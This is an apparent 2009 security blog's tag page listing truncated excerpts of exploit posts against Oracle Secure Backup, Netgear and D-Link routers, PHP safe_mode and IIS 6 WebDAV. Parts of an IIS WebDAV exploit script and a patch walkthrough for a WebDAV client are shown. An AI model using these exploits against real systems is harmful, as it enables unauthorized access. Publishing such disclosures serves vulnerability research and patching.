GO IT WORLD | IT TECH | IT NEWS » bypass

Oracle Secure Backup Server 10.3.0.1.0 Auth Bypass/RCI Exploit

jason — Tue, 06 Oct 2009 12:52:58 +0000

#!/bin/bash

#Oracle Secure Backup Administration Server authentication bypass, plus command injection vulnerability
#1-day exploit for CVE-2009-1977 and CVE-2009-1978

#PoC script successfully tested on:
#Oracle Secure Backup Server 10.3.0.1.0_win32_release
#MS Windows Professional XP SP3

#In August 2009, ZDI discloses a few details regarding a couple of interesting vulnerabilities within Oracle Backup Admin server.
#Since I was quite interested in such flaws, I did a bit of research. This PoC exploits two separate vulnerabilities: a smart
#authentication bypass and a trivial command injection, resulting in arbitrary command execution.

#References:… Read the rest

Netgear DG632 Router Authentication Bypass Vulnerability

jason — Tue, 16 Jun 2009 09:49:34 +0000

Product Name: Netgear DG632 Router
Vendor: http://www.netgear.com
Date: 15 June, 2009
Author: tom@tomneaves.co.uk < tom@tomneaves.co.uk >
Original URL: http://www.tomneaves.co.uk/Netgear_DG632_Authentication_Bypass.txt
Discovered: 18 November, 2006
Disclosed: 15 June, 2009

I. DESCRIPTION

The Netgear DG632 router has a web interface which runs on port 80.
This allows an admin to login and administer the device’s settings.
Authentication of this web interface is handled by a script called
"webcm" residing in "/cgi-bin/" which redirects to the relevant pages
depending on successful user authentication. Vulnerabilities in this
interface enable an… Read the rest

PHP <= 5.2.9 Local Safemod Bypass Exploit

jason — Wed, 27 May 2009 04:34:43 +0000

Title : PHP <= 5.2.9 SafeMod Bypass Vulnerability (win32)
Affected Version : Tested on 5.2.8, 5.2.6 but previous versions maybe be afftect
Vendor Site : www.php.net

Vulnerability Discoverd by : www.abysssec.com

Description :

Here is another safemod bypass vulnerability exist in php <= 5.2.9 on windows .
the problem comes from OS behavior – implement and interfacing between php
and operation systems directory structure . the problem is php won’t tell difference
between directory browsing in linux and windows this can lead attacker to ability
execute his / her commands on… Read the rest

Microsoft IIS 6.0 WebDAV Remote Authentication Bypass Exploit (php)

jason — Sat, 23 May 2009 04:07:00 +0000

print_r(‘
******** IIS 6 WEBDAV Exploit.By racle@tian6.com && Securiteweb.org ********

       Usage: php ‘.$argv[0].’ source/path/put host path
       Example: php ‘.$argv[0].’ source www.tian6.com /blog/readme.asp
       Example2: php ‘.$argv[0].’ path www.tian6.com /secret/
       Example3: php ‘.$argv[0].’ put www.tian6.com /secret/ test.txt(evil code as test.txt)
****************************************************************
‘);

//verification du debut
if($argv[1]!=”source”&&$argv[1]!=”path”&&$argv[1]!=”put”){echo “Choose a action,source or path or put.”;die;}
else {$action=$argv[1];}

if(stristr($argv[2],”http://”)){echo “No http:// in the host!”;die;}
else{$host=$argv[2];}

if(stristr($argv[3],”/”)==false){echo “Where is the / ?”;die;}
else{$path=$argv[3];}
//sent
function sent($sock)
{
global $host, $html;
… Read the rest

Microsoft IIS6 WebDAV Remote Authentication Bypass Exploit (patch)

jason — Fri, 22 May 2009 02:30:10 +0000

Blog with a detailed description:
# http://www.skullsecurity.org/blog/?p=285
#
# And the patch itself:
# http://www.skullsecurity.org/blogdata/cadaver-0.23.2-h4x.patch
#
# > mkdir cadaver-h4x
# > cd cadaver-h4x
# > wget http://www.skullsecurity.org/blogdata/cadaver-0.23.2-h4x.patch
# –snip–
# > wget http://www.webdav.org/cadaver/cadaver-0.23.2.tar.gz
# –snip–
# > tar xzvf cadaver-0.23.2.tar.gz
# –snip–
# > cd cadaver-0.23.2/
# > patch -p1 < ../cadaver-0.23.2-h4x.patch
# patching file lib/neon/ne_basic.c
# patching file lib/neon/ne_request.c
# patching file lib/neon/ne_uri.c
# > ./configure
# –snip–
# > make Read the rest

D-Link Captcha Bypass

jason — Mon, 18 May 2009 03:43:55 +0000

D-Link released new firmware designed to protect against malware that
alters DNS settings by logging in to the router using default administrative
credentials. There is a flaw in the captcha authentication system that allows
an attacker to glean your WiFi WPA pass phrase from the router with only user-level
access, and without properly solving the captcha.

When you login with the captcha enabled, the request looks like this:

GET /post_login.xmlhash=c85d324a36fbb6bc88e43ba8d88b10486c9a286a&auth_code=0C52
F&auth_id=268D2

The hash is a salted MD5 hash of your password, the auth_code is the captcha value that
you entered, and… Read the rest